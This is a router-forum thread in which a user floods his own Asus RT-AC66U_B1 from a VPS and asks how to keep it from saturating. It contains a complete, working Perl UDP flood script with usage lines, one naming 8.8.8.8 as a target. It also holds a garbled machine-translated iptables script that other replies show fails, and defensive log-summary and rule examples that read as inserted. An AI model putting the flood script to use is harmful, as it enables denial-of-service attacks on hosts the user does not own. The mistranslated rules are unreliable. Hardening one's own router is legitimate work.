RT-AC66U_B1 PERL ATTACK

Miguel

Occasional Visitor
Hello everyone, I am a little desperate with my router and Merlin firmware. I am testing DDoS attacks with a script in Perl and my WAN and LAN are falling. I have the firewall and DDoS options enabled, but it is impossible to configure some script in JFFS to prevent the router from saturating itself?
I need help, please.

perl ddos.pl xx.xx.xx.xx 0 1 10
Code:
#!/usr/bin/perl

#Args
# 1 - IP
# 2 - Port
# 3 - Size of the packet to send
# 4 - Time in secondes

use Socket;
use strict;

if ($#ARGV != 3) {
  print "-Tip on use : perl DDoS.pl 8.8.8.8 80 2048 500\n";
  exit(1);
}

my ($ip,$port,$size,$time) = @ARGV;
my ($iaddr,$endtime,$psize,$pport);
$iaddr = inet_aton("$ip") or die "Cannot connect to $ip\n";
$endtime = time() + ($time ? $time : 1000000);
socket(flood, PF_INET, SOCK_DGRAM, 17);
print "~To cancel the attack press \'Ctrl-C\'\n\n";
print "|IP|\t\t |Port|\t\t |Size|\t\t |Time|\n";
print "|$ip|\t |$port|\t\t |$size|\t\t |$time|\n";
print "To cancel the attack press 'Ctrl-C'\n" unless $time;
for (;time() <= $endtime;) {
  $psize = $size ? $size : int(rand(1500-64)+64) ;
  $pport = $port ? $port : int(rand(65500))+1;

  send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport, $iaddr));}
 
If you have DROPPED packet logging turned on during your test, try turning off all packet logging. I've seen that the syslog flood can cause problems.
 
You need to be testing this from the internet side. It won't work if you're testing from your LAN.
 
And running Perl on the router's limited CPU and RAM is probably not a good idea either.
 
I am sending the attack from a VPS to my home, where the Asus router is, with a connection of 100 Mbps, but my connection is 300 Mbps. It seems to be overloading the router with packets.
 
When I launch my attack and the router becomes accessible again, I see these logs.

Code:
Apr 21 17:20:02 kernel: DROP IN=eth0 OUT= MAC=50:32:75:e7:6d:a4:00:17:10:8b:d2:87:08:00 SRC=IP VPS DST=IP ASUS LEN=29 TOS=0x00 PREC=0x00 TTL=46 ID=1539 DF PROTO=UDP SPT=34309 DPT=57378 LEN=9
Apr 21 17:20:02 kernel: DROP IN=eth0 OUT= MAC=50:32:75:e7:6d:a4:00:17:10:8b:d2:87:08:00 SRC=IP VPS DST=IP ASUS LEN=29 TOS=0x00 PREC=0x00 TTL=46 ID=65474 DF PROTO=UDP SPT=34309 DPT=46671 LEN=9
Apr 21 17:20:02 kernel: DROP IN=eth0 OUT= MAC=50:32:75:e7:6d:a4:00:17:10:8b:d2:87:08:00 SRC=IP VPS DST=IP ASUS LEN=29 TOS=0x00 PREC=0x00 TTL=46 ID=4599 DF PROTO=UDP SPT=34309 DPT=63405 LEN=9

I have hundreds of identical entries. I think the router is not able to block so many packets. I have a more basic router and it supports the load better.
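A way to summarise DROP entries like the ones in this post, as an added example that is not part of the thread: it counts packets and distinct destination ports per source and protocol, so one source spraying many ports (what the posted command produces with port `0` and size `1`, hence `LEN=29`) stands out. The sample lines are constructed in the same format, with documentation addresses in place of the redacted `SRC`/`DST` values; `sample_log` and `summarize_drops` are names chosen here.

```shell
#!/bin/sh
# Added example, not from the thread. Constructed sample lines in the logged
# format; 203.0.113.10, 192.0.2.44 and 198.51.100.7 are documentation addresses.
sample_log() {
cat <<'EOF'
Apr 21 17:20:02 kernel: DROP IN=eth0 OUT= SRC=203.0.113.10 DST=198.51.100.7 LEN=29 TTL=46 ID=1539 DF PROTO=UDP SPT=34309 DPT=57378 LEN=9
Apr 21 17:20:02 kernel: DROP IN=eth0 OUT= SRC=203.0.113.10 DST=198.51.100.7 LEN=29 TTL=46 ID=65474 DF PROTO=UDP SPT=34309 DPT=46671 LEN=9
Apr 21 17:20:02 kernel: DROP IN=eth0 OUT= SRC=203.0.113.10 DST=198.51.100.7 LEN=29 TTL=46 ID=4599 DF PROTO=UDP SPT=34309 DPT=63405 LEN=9
Apr 21 17:20:03 kernel: DROP IN=eth0 OUT= SRC=192.0.2.44 DST=198.51.100.7 LEN=40 TTL=52 ID=0 DF PROTO=TCP SPT=40112 DPT=23 LEN=20
EOF
}

# summarize_drops: read kernel DROP lines on stdin and print one line per
# source and protocol: "SRC PROTO packets distinct_dst_ports", busiest first.
summarize_drops() {
  awk '/kernel: DROP / {
    src = proto = dpt = ""
    for (i = 1; i <= NF; i++) {
      if ($i ~ /^SRC=/)   src   = substr($i, 5)
      if ($i ~ /^PROTO=/) proto = substr($i, 7)
      if ($i ~ /^DPT=/)   dpt   = substr($i, 5)
    }
    key = src " " proto
    pkts[key]++
    # Count each destination port once per source/protocol pair.
    if (dpt != "" && !((key, dpt) in seen)) { seen[key, dpt] = 1; ports[key]++ }
  }
  END { for (k in pkts) print k, pkts[k], ports[k] + 0 }' | sort -k3,3nr
}

sample_log | summarize_drops
```

A packet count that tracks the distinct-port count for a single source and source port is the pattern of the random-port UDP test described above, as opposed to ordinary background scanning.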
 
I thought you said you had packet logging off????
 
I loaded a script on the Asus router,

but without results. Sadly, I bought the router thinking it would solve some of the problems with my attacks, but I see that I threw the money away.
Code:

# How to use: the shebang is declared as follows

#! / Bin / bash

# Create the files where the IPs for the blacklists will be stored;

iptables -A -m listanegra Reciente --name blacklist_180 --rcheck --seconds 180 "Denegar Los Paquetes De Las Direcciones IP ingresadas Por Un Negra La Lista 180 segundos" -m comentario --comment -j DROP

# Stop the ICMP flood
# Create the chain for the ICMP flood
iptables -N cadena-ICMP-inundación

# Jump to the chain when ICMP is detected
iptables -p icmp -j Entrada Cadena-ICMP-Inundaciones

# Leave the chain if the packet rate from the same IP is below 4 per second, with a burst of 8 per second
iptables -A -m Límite-Cadena ICMP-inundación --limit 4 / s --limit-burst 8 -m comentario --comment "margen de Límite ICMP" -j RETORNO

# Log the flood when the rate is higher
iptables -A cadena-ICMP-inundación Límite -m --limit 6 / h --limit-burst 1 -j LOG --log-prefijo "Cortafuegos: Probable inundación ICMP"

# Blacklist the IP for 3 minutes
iptables -A cadena-ICMP-inundación -m Reciente --name blacklist_180 --set -m comentario --comment "ListaNegra origen IP" -j DROP

# Stop UDP floods

# Create the chain for UDP floods
iptables -N cadena-udp-inundación

# Jump to the chain when UDP is detected
iptables -A ENTRADA udp p -j Cadena-UDP-Inundaciones

# Limit the UDP rate to 10 per second with a limit of 20
iptables -A -m Límite Cadena-UDP-inundación --limit 10 / s --limit estallar-20 -m comentario --comment "Limite Velocidad UDP" -j RETURN

# Log
iptables -A Límite -m cadena-udp-inundación --limit 6 / h --limit-burst 1 -j LOG --log-prefijo "Cortafuegos: Probable inundación udp"

# Deny flooders for 3 minutes
iptables -A cadena-UDP-inundación -m Reciente --name blacklist_180 --set -m comentario --comment "ListaNegra origen IP" -j DROP

# Stop SYN floods

# Create the syn-flood chain
iptables -N cadena-syn-inundación

# Jump to the syn-flood chain when the packet is detected
iptables -p TCP ENTRADA --syn -J Cadena-syn-Inundaciones

# Limit the packet rate to two per second, with a burst of 6 per second
iptables -A -m Límite Cadena-syn-inundación --limit 2 / s --limit-burst 6 -m comentario --comment "Limitar Velocidad TCP SYN" -j RETURN

# Log flooders
iptables -A Límite -m cadena-syn-inundación --limit 6 / h --limit-burst 1 -j LOG --log-prefijo "Cortafuegos: Probable inundación syn"

# Ban flooders for 3 minutes
iptables -A cadena-syn-inundación -m Reciente --name blacklist_180 --set -m Comentar --comment soltar "IP de origen de Lista negra" -j

# Stop other kinds of SYN flood attacks
iptables -p tcp ENTRADA! --syn comentario -m NUEVO --comment estado -m --state "Cortar La Conexión TCP SYN Que No empiezan por" -j DROP
 
I hope you are not trying to use that script because it is full of errors.
Code:
# iptables -A -m listanegra Reciente --name blacklist_180 --rcheck --seconds 180 "Denegar Los Paquetes De Las Direcciones IP ingresadas Por Un Negra La Lista 180 segundos" -m comentario --comment -j DROP
Bad argument `listanegra'
Try `iptables -h' or 'iptables --help' for more information.

# iptables -N cadena-ICMP-inundacin

# iptables -p icmp -j Entrada Cadena-ICMP-Inundaciones
Bad argument `Cadena-ICMP-Inundaciones'
Try `iptables -h' or 'iptables --help' for more information.

# iptables -A -m Lmite-Cadena ICMP-inundacin --limit 4 / s --limit-burst 8 -m comentario --comment "margen de Lmite ICMP" -j RETORNO
Bad argument `Lmite-Cadena'
Try `iptables -h' or 'iptables --help' for more information.

#
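The rule set the posted script appears to be aiming for, written in valid iptables syntax as an added example (not part of any post in this thread). The rates and the `blacklist_180` list name come from the post; the chain names, the log prefix and the `flood_chain`/`emit_rules` helpers are chosen here. It prints the commands for review instead of running them.

```shell
#!/bin/sh
# Added example, not from the thread: prints iptables commands for review.
# Load them as root with: emit_rules | sh

BL=blacklist_180   # name of the `recent` list, as in the posted script

# flood_chain MATCH CHAIN RATE BURST
# Create CHAIN, send matching INPUT traffic to it, RETURN while under RATE,
# then log sparingly (6 per hour, prefix kept under the 29-character limit)
# and record the source in the blacklist before dropping the packet.
flood_chain() {
  match=$1 chain=$2 rate=$3 burst=$4
  cat <<EOF
iptables -N $chain
iptables -A INPUT $match -j $chain
iptables -A $chain -m limit --limit $rate --limit-burst $burst -j RETURN
iptables -A $chain -m limit --limit 6/h --limit-burst 1 -j LOG --log-prefix "FLOOD $chain: "
iptables -A $chain -m recent --name $BL --set -j DROP
EOF
}

emit_rules() {
  # Drop everything from a source that was blacklisted in the last 180 seconds.
  echo "iptables -A INPUT -m recent --name $BL --rcheck --seconds 180 -j DROP"
  flood_chain "-p icmp"      icmp-flood 4/s  8
  flood_chain "-p udp"       udp-flood  10/s 20
  flood_chain "-p tcp --syn" syn-flood  2/s  6
  # New TCP connections that do not start with SYN are dropped.
  echo "iptables -A INPUT -p tcp ! --syn -m state --state NEW -j DROP"
}

emit_rules
```

`-m limit` counts every packet that reaches the rule, not packets per source, so a flood can push legitimate senders over the limit and into the blacklist. Rules appended with `-A` only take effect if no earlier INPUT rule already accepts or drops the packet, so check `iptables -S INPUT` before loading them.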
 
Maybe that does not work. Is there any script that I can load on the Asus? My knowledge of iptables is scarce. Is there any way to avoid a SYN flood? The iptables rules that it brings by default do drop, but the router gets saturated and I lose the WAN and LAN.
Sorry for my bad English.


When I launch the attack from the VPS to my home, the Asus router does not respond to ping on the LAN gateway until the attack ends.
 
Because this message has the words "perl attack" in the link, I had to disable my Avast A/V just to view and post... good luck with your script.
 
